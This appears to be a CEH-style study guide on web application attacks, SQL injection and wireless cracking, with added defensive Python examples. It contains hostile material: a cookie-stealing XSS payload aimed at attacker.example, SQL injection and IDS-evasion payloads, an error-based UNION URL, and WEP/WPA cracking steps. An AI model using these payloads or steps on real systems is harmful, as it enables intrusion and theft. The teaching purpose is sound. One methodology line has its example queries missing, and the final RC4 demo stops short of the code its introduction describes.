When an e-commerce web site has been compromised, there is a good chance the attacker used unvalidated input as an element of the attack. If information submitted via a web site is not validated before it's processed, an attacker can obtain sensitive information or attack the site.

Web applications use input from HTTP requests (and occasionally files) to determine how to respond. Attackers can tamper with any part of an HTTP request, including the URL, query string, headers, cookies, form fields, and hidden fields, to try to bypass the site's security mechanisms. Common names for common input tampering attacks include: forced browsing, command insertion, cross-site scripting (XSS), buffer overflows, format string attacks, SQL injection, cookie poisoning, and hidden field manipulation.

Parameters should be validated against a positive specification that defines:
. Data type (string, integer, real, etc.)
. Allowed character set
. Minimum and maximum length
. Whether null is allowed
. Whether the parameter is required or not
. Whether duplicates are allowed
. Numeric range
. Specific legal values (enumeration)
. Specific patterns (regular expressions)
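A positive-specification validator covering each point in the list above, as an added example that is not code from the study guide or from any framework. The ParamSpec fields, the validate function and the hypothetical order-form specification are assumptions made for the example; the input format (each name mapped to a list of raw string values, as a query-string parser returns them) is chosen so that duplicates can be detected. Anything the specification does not explicitly allow, including parameters it does not name, is rejected before the application sees it.

```python
"""Allow-list parameter validation against a positive specification."""
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ParamSpec:
    kind: type                          # str or int (the data type rule)
    required: bool = True
    allow_null: bool = False            # may the value be empty?
    min_len: int = 0
    max_len: int = 256
    charset: Optional[str] = None       # regex character class, e.g. r"[A-Za-z0-9_]"
    pattern: Optional[str] = None       # full-match regular expression
    min_value: Optional[int] = None     # numeric range, ints only
    max_value: Optional[int] = None
    legal_values: Optional[set] = None  # enumeration
    allow_duplicates: bool = False      # repeated ?name=a&name=b


def validate(params: dict, spec: dict) -> tuple[dict, list[str]]:
    """params maps name -> list of raw string values. Returns (clean values,
    error messages). Unknown names are errors: the list is positive, so
    nothing unspecified gets through."""
    clean, errors = {}, []
    for name in params:
        if name not in spec:
            errors.append(f"{name}: not an expected parameter")
    for name, s in spec.items():
        values = params.get(name, [])
        if not values:
            if s.required:
                errors.append(f"{name}: required")
            continue
        if len(values) > 1 and not s.allow_duplicates:
            errors.append(f"{name}: duplicates not allowed")
            continue
        raw = values[0]
        if raw == "":
            if s.allow_null:
                clean[name] = None
            else:
                errors.append(f"{name}: empty value not allowed")
            continue
        if not (s.min_len <= len(raw) <= s.max_len):
            errors.append(f"{name}: length {len(raw)} outside {s.min_len}..{s.max_len}")
            continue
        if s.charset and not re.fullmatch(f"(?:{s.charset})*", raw):
            errors.append(f"{name}: illegal characters")
            continue
        if s.pattern and not re.fullmatch(s.pattern, raw):
            errors.append(f"{name}: does not match expected format")
            continue
        if s.kind is int:
            if not re.fullmatch(r"-?\d+", raw):
                errors.append(f"{name}: not an integer")
                continue
            value = int(raw)
            too_small = s.min_value is not None and value < s.min_value
            too_large = s.max_value is not None and value > s.max_value
            if too_small or too_large:
                errors.append(f"{name}: {value} outside numeric range")
                continue
        else:
            value = raw
        if s.legal_values is not None and value not in s.legal_values:
            errors.append(f"{name}: not a legal value")
            continue
        clean[name] = value
    return clean, errors


# Constructed specification for a hypothetical order form.
ORDER_SPEC = {
    "item":   ParamSpec(str, charset=r"[A-Za-z0-9_-]", min_len=1, max_len=32),
    "qty":    ParamSpec(int, min_value=1, max_value=100),
    "ship":   ParamSpec(str, legal_values={"ground", "air"}),
    "coupon": ParamSpec(str, required=False, pattern=r"[A-Z]{4}-\d{4}"),
}
```

Because the character set for item is restricted, a traversal string such as ../../etc/passwd never reaches file-handling code, and a negative quantity fails the numeric range before any price is computed; the validator reports every failing field rather than stopping at the first, which keeps the error list useful for logging.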

Parameter/Form Tampering
Parameter tampering occurs when the client side of the web application holds sensitive information which is then manipulated by an attacker. When the client sends the parameters of the exchange to the server, those parameters can be modified by using a proxy.

This type of attack also occurs when hidden fields are used by websites for e-commerce transactions. The price or quantity field is transmitted by the client, which makes the field susceptible to being altered by an attacker. This is called Hidden Field Manipulation.

Directory Traversal
The goal of this attack is to order an application to access a computer file that is not intended to be accessible. This attack exploits a lack of security (the software is acting exactly as it is supposed to) as opposed to exploiting a bug in the code. Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking.
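Mapping a user-supplied file name onto a document root so that a ../ sequence cannot climb out of it, as an added example that is not code from the study guide. The safe_resolve helper, the TraversalError class and the /var/www/html root are assumptions; the function works on path strings only (no file access), so the constructed requests can be checked offline. It decodes percent-encoding before normalising, treats backslashes as separators, and then requires the collapsed path to lie inside the root.

```python
"""Reject directory traversal by resolving against a document root."""
import posixpath
from urllib.parse import unquote


class TraversalError(ValueError):
    """Raised when a requested path would resolve outside the document root."""


def safe_resolve(document_root: str, requested: str) -> str:
    """Map `requested` (the path part of a URL) onto a file under document_root.

    Returns the normalised absolute path, or raises TraversalError.
    """
    # Decode percent-encoding first so %2e%2e%2f is seen as ../ by the check.
    # (A doubly encoded %252e decodes to the literal text "%2e", which is then
    # just an odd file name inside the root, not a traversal.)
    decoded = unquote(requested)
    # Some servers accept backslashes as separators; normalise them too.
    decoded = decoded.replace("\\", "/")
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    root = posixpath.normpath(document_root)
    # A leading slash in a URL path means "relative to the root", not "/".
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Compare against root + "/" so that "/var/www-private" is not mistaken
    # for a child of "/var/www".
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalError(f"path escapes document root: {requested!r}")
    return candidate


if __name__ == "__main__":
    for req in ["index.html", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"]:
        try:
            print(req, "->", safe_resolve("/var/www/html", req))
        except TraversalError as exc:
            print(req, "-> rejected:", exc)
```

On a real server this check belongs after the validator's character-set rule, not instead of it, and symbolic links under the root are a separate concern that a string check cannot see; resolve with os.path.realpath before opening the file if links are present.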

Security Misconfigurations
Web server and application server configurations play a key role in the security of a web application. These servers are responsible for serving content and invoking applications that generate content. In addition, many application servers provide a number of services that web applications can use, including data storage, directory services, mail, messaging, and more. Failure to manage the proper configuration of your servers can lead to a wide variety of security problems.

Frequently, the web development group is separate from the group operating the site. In fact, there is often a wide gap between those who write the application and those responsible for the operations environment. Web application security concerns often span this gap and require members from both sides of the project to properly ensure the security of a site's application.

There are a wide variety of server configuration problems that can plague the security of a site. These include:
. Unpatched security flaws in the server software
. Server software flaws or misconfigurations that permit directory listing and directory traversal attacks
. Unnecessary default, backup, or sample files, including scripts, applications, configuration files, and web pages
. Improper file and directory permissions
. Unnecessary services enabled, including content management and remote administration
. Default accounts with their default passwords
. Administrative or debugging functions that are enabled or accessible
. Overly informative error messages (more details in the error handling section)
. Misconfigured SSL certificates and encryption settings
. Use of self-signed certificates to achieve authentication and man-in-the-middle protection
. Use of default certificates
. Improper authentication with external systems

Some of these problems can be detected with readily available security scanning tools. Once detected, these problems can be easily exploited and result in total compromise of a website. Successful attacks can also result in the compromise of backend systems including databases and corporate networks. Having secure software and a secure configuration are both required in order to have a secure site.

Injection Attacks
Injection problems encompass a wide variety of issues, all mitigated in very different ways. For this reason, the most effective way to discuss these flaws is to note the distinct features which classify them as injection flaws. The most important issue to note is that all injection problems share one thing in common: they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instances of this category of flaw are SQL injection and format string vulnerabilities.

SQL Injection
SQL injection takes advantage of the syntax of SQL to inject commands that can read or modify a database, or change the meaning of the original query.
For example, consider a web page with two fields that allow users to enter a user name and a password. The code behind the page generates a SQL query to check the password against the list of user names:

SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'Password'

If this query returns any rows, access is granted. However, if the malicious user enters a valid Username and injects some valid SQL (password' OR '1'='1) in the Password field, the resulting query will look like this:

SELECT UserList.Username FROM UserList WHERE UserList.Username = 'Username' AND UserList.Password = 'password' OR '1'='1'

In the example above, "password" is assumed to be blank or some innocuous string. '1'='1' is always true, and because AND binds more tightly than OR the whole WHERE clause is true for every row, so many rows are returned and access is granted.
The technique may be refined to allow multiple statements to run, or even to load and run external programs.

Cross-Site Scripting (XSS) Attacks
Cross-site scripting (XSS) is a security exploit in which the attacker inserts malicious code into a link that appears to be from a trustworthy source. When someone clicks on the link, the embedded code is submitted as part of the client's web request and executes in the user's browser, typically allowing the attacker to steal information.
Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS: rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.
Stored XSS Attacks
Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, a message forum, a visitor log, or a comment field. The victim then retrieves the malicious script from the server when requesting the stored information.
Reflected XSS Attacks
Reflected attacks are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected attacks are delivered to victims via another route, such as an e-mail message or another web server. When a user is tricked into clicking a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server.
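The reflected case above comes down to one line of server code that copies request input into the response. The block below is an added example (it is not part of the study guide) showing that line next to its output-encoded replacement, plus the attribute-context variant that needs quote escaping too. The search page, the payload and the helper names are all constructed for the demo; CSRF is not covered here.

```python
import html
import re

# Constructed inputs for the demo (not from the original page): a normal search
# term and a reflected-XSS payload that sends the session cookie to the attacker.
BENIGN_QUERY = "wireless routers"
XSS_PAYLOAD = ('<script>document.location="http://attacker.example/?c="'
               '+document.cookie</script>')


def render_search_vulnerable(query: str) -> str:
    """Reflects the search term into the response unchanged. The browser cannot
    tell the attacker's markup from the site's own, so the script runs."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Same page with output encoding: '<', '>', '&' and both quote characters
    are replaced by entities, so the payload is displayed as text, not executed."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def render_attribute_safe(value: str) -> str:
    """Reflection inside a quoted attribute needs quote escaping as well; an
    unescaped double quote would close the attribute and let the attacker
    append an event handler such as onfocus=..."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


_SCRIPT_OPEN = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """Demo check: is a real <script> start tag left in the rendered HTML
    (as opposed to the harmless entity form &lt;script&gt;)?"""
    return _SCRIPT_OPEN.search(page) is not None


if __name__ == "__main__":
    for label, render in (("vulnerable", render_search_vulnerable),
                          ("safe", render_search_safe)):
        page = render(XSS_PAYLOAD)
        print(f"{label:10s} script survives: {contains_live_script(page)}")
        print("   ", page)
```

The encoding has to match the context the value lands in: html.escape is right for element text and quoted attributes, but a value placed inside a script block or a URL needs JavaScript string escaping or URL encoding instead.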

Web Services Attacks
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model.
Web services typically present a public functional interface, capable of being called in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases.

Hackers are rapidly learning how to effectively compromise web services technologies to carry out their attacks or gain valuable footprinting information. These are the tools our practice uses:
. Burp Suite
. W3af
. OWASP

How to Defend Against Web Application Attacks
Make sure you are familiar with these concepts.

. Validate and sanitize input
. Safely handle different encoding schemes
. Low-privilege accounts for the database connection
. Custom error messages, so there isn't a mess of information available to average users
. Validate redirects and forwards, or avoid using them at all
. No session identifiers in GET or POST parameters (keep them in cookies)
. Secure cookies, and do not store sensitive info in plain text
. The least amount of information about services on a server as possible
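"Validate redirects and forwards" is the item in the list above that is most often done wrong, because the obvious check (does it start with a slash? does it contain our domain?) has several bypasses. The block below is an added example, not code from the study guide, of a redirect-target validator written as an allowlist; the hostnames and the test inputs are constructed for the demo.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist for the demo (not from the original page).
ALLOWED_HOSTS = {"shop.example.com", "account.example.com"}
DEFAULT_TARGET = "/"


def safe_redirect_target(user_supplied: str,
                         allowed_hosts=ALLOWED_HOSTS,
                         fallback: str = DEFAULT_TARGET) -> str:
    """Return a redirect target that stays on our own hosts, or `fallback`.

    Checks, in order:
      * control characters and backslashes are rejected outright: browsers
        treat '\\' as '/', so '/\\evil.example' becomes '//evil.example'
      * a scheme-less, host-less value must be a path with ONE leading slash
        ('//evil.example' is a scheme-relative URL and leaves the site)
      * anything else must be http/https (no javascript:, data:, ...) and
        its hostname, compared case-insensitively and with any user@ part
        ignored, must be on the allowlist
    """
    if not user_supplied:
        return fallback
    candidate = user_supplied.strip()
    if any(ch in candidate for ch in "\\\r\n\t\x00"):
        return fallback

    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return fallback

    if parts.scheme.lower() not in ("http", "https"):
        return fallback
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return fallback
    # Rebuild from the parsed pieces: this drops userinfo, port and fragment,
    # so 'https://shop.example.com@evil.example/' cannot survive.
    return urlunsplit((parts.scheme.lower(), host, parts.path or "/",
                       parts.query, ""))


if __name__ == "__main__":
    for sample in ["/account/orders?id=5", "//evil.example/phish",
                   "/\\evil.example", "javascript:alert(1)",
                   "https://shop.example.com@evil.example/",
                   "https://SHOP.example.com/cart?x=1#top"]:
        print(f"{sample!r:45s} -> {safe_redirect_target(sample)!r}")
```

Rebuilding the URL from parsed components rather than returning the original string is the important design choice: it means the only way attacker input reaches the Location header is through fields the parser has already classified.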

Web Application Firewalls
A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Web Application Pen Testing
Web application penetration testing refers to a set of services used to detect various security issues with web applications and identify vulnerabilities and risks, including:
. Known vulnerabilities in COTS (Commercial Off The Shelf) applications
. Technical vulnerabilities: URL manipulation, SQL injection, cross-site scripting, back-end authentication, passwords in memory, session hijacking, buffer overflow, web server configuration, credential management, clickjacking, etc.
. Business logic errors: day-to-day threat analysis, unauthorized logins, personal information modification, price list modification, unauthorized funds transfer, breach of customer trust, etc.
OWASP, the Open Web Application Security Project, an open source web application security documentation project, has produced documents such as the OWASP Guide and the widely adopted OWASP Top 10 awareness document.


Module 14 SQL Injection Study Guide
Objectives:
. Introduction to SQL Injection
. Types of SQL Injection
. SQL Injection Methodology
. Common SQL Injection
. Advanced SQL Injection
. SQL Injection Tools
. Signature Evasion Techniques
. Defending Against SQL Injection

Introduction to SQL Injection
SQL injection is the most common enemy. The vulnerability behind SQL injection is that data is not validated before it is sent to the database. SQL injections occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. This allows for a significant bypassing of security measures. This is a specific version of the injection attack identified in module 13. A successful SQL injection can lead to information theft and tampering, as well as possible Denial of Service attacks.
Critical Concepts
Server Side Technologies
ASP.NET and relational databases such as SQL Server, Oracle, IBM DB2 and MySQL are all server side technologies that are susceptible to SQL injection attacks. It is not a matter of specific vulnerabilities in the software but of the way they are used to create dynamic content without data validation.
HTTP Post Request
When data is sent to the server with the HTTP GET method it is visible in the URL; when the POST method is used it travels in the request body instead, but it is just as easy to change with a proxy or a crafted form. In a vulnerable implementation this data is used to build the SQL query, and when it is changed the SQL query changes with it.
SQL Commands and Logic
A common login method is to match a username and password. In a legitimate interaction these two bits of data are looked up in a table; if the user's input matches the data found in the table, the user is considered authenticated. The authentication occurs because, logically, the matching data creates a TRUE condition. In a vulnerable implementation, entering another TRUE condition such as 1=1, followed by a comment sequence (-- in most SQL dialects) to comment out the rest of the SQL request, will also result in authentication.
Using this logic a hacker can use true conditions to edit the table, add records, display records, or just delete the table.
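The login bypass described here, and the OR '1'='1' example in the SQL Injection section of module 13, both come from one code pattern: the user's input is concatenated into the SQL text. The block below is an added example (not from the study guide) that runs both injections against that pattern in an in-memory SQLite database and then shows the parameterized query that defeats them. The UserList rows and the credentials are constructed for the demo; passwords are stored in clear text only to mirror the query in the text.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory UserList for the demo (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UserList (Username TEXT, Password TEXT)")
    conn.executemany("INSERT INTO UserList VALUES (?, ?)",
                     [("admin", "Tr0ub4dor&3"), ("jroberts", "winter2011")])
    conn.commit()
    return conn


def build_query(username: str, password: str) -> str:
    """The query-building pattern the text describes: user input is glued into
    the SQL text, so quotes, OR and -- in the input become SQL syntax."""
    return ("SELECT UserList.Username FROM UserList WHERE UserList.Username = '"
            + username + "' AND UserList.Password = '" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    try:
        rows = conn.execute(build_query(username, password)).fetchall()
    except sqlite3.Error:
        return False          # a query that fails to parse just fails the login
    return len(rows) > 0      # "if this query returns any rows, access is granted"


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the SQL text and the values travel separately, so
    the database never parses the user's input as SQL."""
    rows = conn.execute(
        "SELECT Username FROM UserList WHERE Username = ? AND Password = ?",
        (username, password)).fetchall()
    return len(rows) > 0


# The two injections from the text: a tautology in the password field, and a
# comment sequence in the username that removes the password check altogether.
TAUTOLOGY_PASSWORD = "x' OR '1'='1"
COMMENTED_USERNAME = "admin'--"

if __name__ == "__main__":
    conn = build_db()
    print(build_query("jroberts", TAUTOLOGY_PASSWORD))
    print("vulnerable, tautology :", login_vulnerable(conn, "jroberts", TAUTOLOGY_PASSWORD))
    print("vulnerable, comment   :", login_vulnerable(conn, COMMENTED_USERNAME, "anything"))
    print("parameterized         :", login_safe(conn, "jroberts", TAUTOLOGY_PASSWORD),
          login_safe(conn, COMMENTED_USERNAME, "anything"))
```

Note that the comment variant lets the attacker pick which account to become, while the tautology returns every row and so depends on how the application treats a multi-row result; both are the same root cause.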

Informative Error Messages
Error messages are used to correct issues with a database query. When these errors are displayed to a hacker they can be used to get important information such as table names, user names, passwords, and even more sensitive information.
One method is to use the UNION command to combine two types of data that cannot be combined, such as a string of characters and an integer. This will produce an error that tells you what data could not be combined. For example:

http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

The matching pattern '%25login%25' is seen as %login% by SQL Server once the URL is decoded. In this case we get the first table name that matches the criteria, "admin_login", because SQL Server tries to convert it to the integer type of the id column and reports the value in the error.
Using this type of command and patience, almost any information can be uncovered.

Types of SQL Injection Attacks
Stored Procedure
Using stored procedures does not necessarily prevent SQL injection. The important thing is to use parameters with stored procedures. If you do not use parameters, your stored procedures can be susceptible to SQL injection if they use unfiltered input.
Union Query
Using UNION to append a second query whose results are returned alongside those of the original query.
Tautology
A tautology is a statement that is always true, such as 1=1. Injecting such a statement along with an OR logically creates a statement that is true, making the SQL injection work.
End of Line Comment
Using -- or other commenting characters to nullify legitimate code suffixed onto the attack code.
Blind SQL Injection
When a target does not provide informative error messages, it may still be susceptible to attack. Hacking when receiving a generic or custom error message requires Blind SQL injection techniques. This requires more time and patience to uncover information.
Injecting a request with the WAITFOR DELAY command and a 10 second sleep will tell a hacker that their command was accepted if the page then delays in its processing. BENCHMARK is another such command (on MySQL).
Blind SQL injection works by asking a series of yes-or-no questions and using the answers to construct an understanding of the target.

SQL Injection Methodology
1. Gather Information
2. Detect vulnerabilities
a. This is done by injecting test queries such as

and

3. Perform error-based, union-based, or blind SQL injections depending on the vulnerabilities and level of error reporting found.
4. Extract desired information
5. Interact with the OS
a. Compromise the machine
b. Execute commands or access system files
6. Move on to compromise the network

Common SQL Injection Hacking
Use SQL injection to grab passwords or hashes, create database accounts in a system, transfer an entire database to your machine, interact with the file system or operating system, or perform network reconnaissance.
Advanced SQL Injection Hacking
Advanced Enumeration
Recognize that different databases require different query types. The CEH test does not require you to know which commands interact with each database type.
Advanced Database Interaction
Using more specific SQL commands it is possible to grab stored password hashes to be broken offline. Another common interaction is to transfer the entire database to the attacker's machine using standard port 80 traffic.
Depending on the level of permissions of the database user it is also possible to interact with the operating system. Examples of this include MySQL's LOAD_FILE function and SQL Server's xp_cmdshell procedure, which respectively allow a file on the server to be read through the database and a command line to be driven through the database.

SQL Injection Tools
. SQLninja
. Absinthe
. SQLsmack

Signature Evasion Techniques
Targets may be set up with an Intrusion Detection System that compares input against strings of known attacks to detect SQL injection attacks. To bypass this, you can obscure your attacks in multiple ways.
Using various forms of encoding you can evade an IDS by not exactly matching what it is looking for. If an IDS is set to block attempts to inject 1=1, you can evade it by using 7=7 or 7>1. Some IDSs can be evaded by encoding in hex or by using the CHAR function to represent characters.
Dropping or adding whitespace can evade signatures as well: the SQL parser does not care how much whitespace separates tokens, while an IDS usually requires an exact match, so UNION SELECT written with one space and with two spaces are read differently by the IDS but identically by the database.
Adding inline comments with /* and */ between tokens (UNION/**/SELECT) will also confuse most IDSs.
String concatenation allows commands to be entered in pieces that the database reassembles. Concatenating these strings allows them to bypass IDS rules written against the commands themselves.
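The evasions above all exploit the same weakness: the signature is matched against the raw request bytes, while the database sees the decoded, comment-stripped, whitespace-normalized tokens. The block below is an added example (not from the study guide) that puts a naive literal-string detector beside one that normalizes the payload first and then evaluates tautologies instead of looking for "1=1" specifically. The payloads, one per technique from the text, are constructed for the demo.

```python
import re
from urllib.parse import unquote

# A naive signature set: literal strings an IDS might ship with for SQL injection.
NAIVE_SIGNATURES = [
    re.compile(r"1=1"),
    re.compile(r"UNION SELECT", re.IGNORECASE),
    re.compile(r"'\s*OR\s*'", re.IGNORECASE),
]


def naive_ids_alerts(payload: str) -> bool:
    """Exact-match detection on the raw request string, as described in the text."""
    return any(sig.search(payload) for sig in NAIVE_SIGNATURES)


def _hex_literal(m) -> str:
    return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"


def _char_call(m) -> str:
    return "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'"


def normalize(payload: str) -> str:
    """Undo the evasions before matching:
    1. URL-decode twice (catches %2527-style double encoding)
    2. strip /* inline comments */
    3. turn 0x.. hex literals and CHAR(n,n,...) back into the string they encode
    4. collapse runs of whitespace to one space and lowercase everything"""
    s = unquote(unquote(payload))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.DOTALL)
    s = re.sub(r"\b0x((?:[0-9a-fA-F]{2})+)\b", _hex_literal, s)
    s = re.sub(r"CHAR\(([\d,\s]+)\)", _char_call, s, flags=re.IGNORECASE)
    s = re.sub(r"\s+", " ", s)
    return s.lower().strip()


UNION = re.compile(r"\bunion(?: all)? select\b")
# "or <literal> <op> <literal>", with optional quotes around either side
TAUTOLOGY = re.compile(r"\bor\s+'?(\w+)'?\s*(>=|<=|<>|!=|=|>|<)\s*'?(\w+)'?")


def _always_true(left: str, op: str, right: str) -> bool:
    """Evaluate the comparison: 7=7, 7>1 and 'a'='a' are tautologies, 1=2 is not."""
    try:
        l, r = int(left), int(right)
    except ValueError:
        l, r = left, right
    return {"=": l == r, ">": l > r, "<": l < r, ">=": l >= r, "<=": l <= r,
            "<>": l != r, "!=": l != r}[op]


def normalized_ids_alerts(payload: str) -> bool:
    s = normalize(payload)
    if UNION.search(s):
        return True
    return any(_always_true(*m.groups()) for m in TAUTOLOGY.finditer(s))


# Constructed evasion payloads (not from the original page), one per technique.
EVASIONS = {
    "different tautology": "' OR 7=7--",
    "extra whitespace":    "1 UNION%20%20SELECT password FROM users",
    "inline comment":      "1 UNION/**/SELECT password FROM users",
    "CHAR() encoding":     "' OR CHAR(49)=CHAR(49)--",
    "double URL encoding": "%2527%2520OR%25201%253D1",
    "hex literal":         "' OR 0x61=0x61--",
}

if __name__ == "__main__":
    for name, payload in EVASIONS.items():
        print(f"{name:20s} naive={naive_ids_alerts(payload)!s:5} "
              f"normalized={normalized_ids_alerts(payload)!s:5} "
              f"-> {normalize(payload)!r}")
```

The normalization step is the real defence, and it is also where the cost goes: decoding and comment stripping have to be done the way the target database does them, or the IDS and the database disagree again.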

Defending Against SQL Injection
Web applications have the following weaknesses which require defending:
The database server can run OS commands. Because of this the database service account needs to have minimal rights, and commands that allow shell prompts and network discovery should be disabled.
Error messages can be manipulated to reveal information in the database. To counteract this, error messages should be custom and suppressed whenever possible.
Data must be validated before it goes to the server. Stored procedures, called with parameters, can be used to process user input and provide a layer of protection. Data should not be concatenated into a query if it has not been validated.
Removing known bad input may not always work as a validation process because of possible encoding techniques; instead sanitize by allowing only known good input.

Module 15 Wireless Networks Study Guide
Objectives:
. Wireless Networks
. Types of Wireless Networks
. Wi-Fi Authentication Modes
. Types of Wireless Encryption
. Wireless Threats
. Wireless Hacking Methodology
. Wireless Hacking Tools
. Bluetooth Hacking
. Defending Against Bluetooth Hacking
. Defending Against Wireless Attacks
. Wi-Fi Security Tools
. Wireless Pen Testing Framework

Wireless Networks
Wireless networks broadcast data so that it can be received in a local area without wires. These networks are easier to install and scale to accommodate more users. They are less secure by virtue of this greater reach: anyone within radio range can receive the traffic.
Types of Wireless Networks
Wireless networks are built on standards. These standards can be set with options about authentication methods and encryption.
Wireless Standards
The 802.11 family of standards covers the use of the wireless spectrum for home and business use. For the CEH you need to understand the differences in megabit per second transmission rates and the frequency bands used.
802.11a operates in the 5 GHz band with a maximum net data rate of 54 Mbit/s. 802.11b is built from the same base standard and operates in the 2.4 GHz band with a maximum data rate of 11 Mbit/s. 802.11g uses the 2.4 GHz band at a data rate of 54 Mbit/s. 802.11n introduced Multiple Input, Multiple Output (MIMO), raising the maximum rate to 600 Mbit/s, and operates in both the 2.4 GHz and 5 GHz bands. All of these standards are marketed under the name Wi-Fi.
Bluetooth is a wireless standard for very short range transmission at low bandwidth. Bluetooth is used for low power devices such as cell phone hands-free headsets, requiring a close range, typically under ten meters.

Wi-Fi Authentication Modes
Open
In open authentication no credentials are checked: any device can authenticate to the Access Point, and the traffic is typically sent unencrypted.
Shared Key
Clients use an encryption key known to both the client and the Access Point to encrypt a challenge text sent from the access point, proving possession of the key before being allowed onto the network.
Centralized
A central server handles the authentication mechanism that allows clients onto the network. The Access Point receives requests and asks for a response that includes an identity to pass on to the central server, such as a RADIUS server, which then handles the actual authentication.
Types of Wireless Encryption
WEP
Wired Equivalent Privacy is an older, insecure encryption method. It uses small keys with flaws in implementation that make it trivial to break using tools like aircrack-ng.
WPA
Wi-Fi Protected Access corrects the flaws in WEP, creating a new wireless standard. Encryption is improved by using TKIP, the Temporal Key Integrity Protocol, which creates a mechanism for changing the key used for each packet.
WPA2 uses AES with 128-bit keys and CCMP for stronger encryption than its predecessor. WPA2 Enterprise integrates with EAP standards for stronger authentication.
CCMP uses 128-bit keys and a 48-bit packet number (initialization vector), which is far larger than WEP's 24-bit IV and is also used for replay detection.
EAP stands for Extensible Authentication Protocol, which allows multiple methods of authentication such as smart cards and tokens.


WEP Flaws
WEP was implemented without public or academic review. The RC4 stream cipher it uses must never produce the same keystream twice, but WEP seeds RC4 with a 24-bit IV prepended to the key, and that IV space is so small that IVs, and therefore keystreams, are repeated on a busy network. Frames with repeated IVs leak plaintext and can be used in replay attacks. Tools such as aircrack-ng allow WEP to be cracked with little technical knowledge.
Breaking WEP Encrypted Wireless Networks
aircrack-ng and a copy of BackTrack on a laptop with an injection-capable wireless card are required for breaking WEP encrypted networks. The wireless card is set into monitor mode. Using airodump-ng, packets are captured to collect IVs. aireplay-ng can be used to do fake authentications and replay packets to generate traffic. Once enough packets are collected, the key can be cracked using aircrack-ng and then used to join the network.
Breaking WPA Encrypted Wireless Networks
With WPA-PSK a Pre-Shared Key is used to begin the TKIP encryption. While the packets themselves are not crackable, this Pre-Shared Key can be brute forced. Within range of the AP, you can capture the four-way handshake and use offline tools, including precomputed tables, to crack the WPA key offline (the tables must be built per SSID, because the SSID is the salt in the key derivation). If there are live clients in range, an attacker can force a client to disconnect. When it reconnects, the handshake can be captured and a brute-force attack run against the Pairwise Master Key (PMK). The PMK is what is used to begin the encrypted session between the access point and the client.
Wireless Threats
Access Control Attacks are used against AP MAC filters or port access controls by spoofing MAC addresses or port addresses.
Integrity Attacks inject data, for example replaying a captured authentication to gain access. These attacks are also used to facilitate other attacks such as Denial of Service.
Confidentiality Attacks intercept data that is assumed to be confidential.
Availability Attacks prevent legitimate use of a wireless network or resource by preventing traffic from reaching it.
Authentication Attacks aim to steal the identity of clients by cracking logins or sniffing credentials.
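The WEP Flaws passage above states the cryptographic problem in one sentence; the block below is an added example (not from the study guide) that shows it happening. It implements textbook RC4, encrypts two frames the way WEP seeds RC4 (IV || key, IV sent in the clear), and recovers the second frame's plaintext from the first without ever learning the key, because C1 XOR C2 = P1 XOR P2 once the keystream repeats. iv_reuse_probability applies the birthday bound to show how few frames a 24-bit IV survives. The key, IV and frame contents are constructed for the demo; the ICV is omitted because it does not affect the flaw.

```python
import math

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling, then XOR the data with the generated
    keystream. Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


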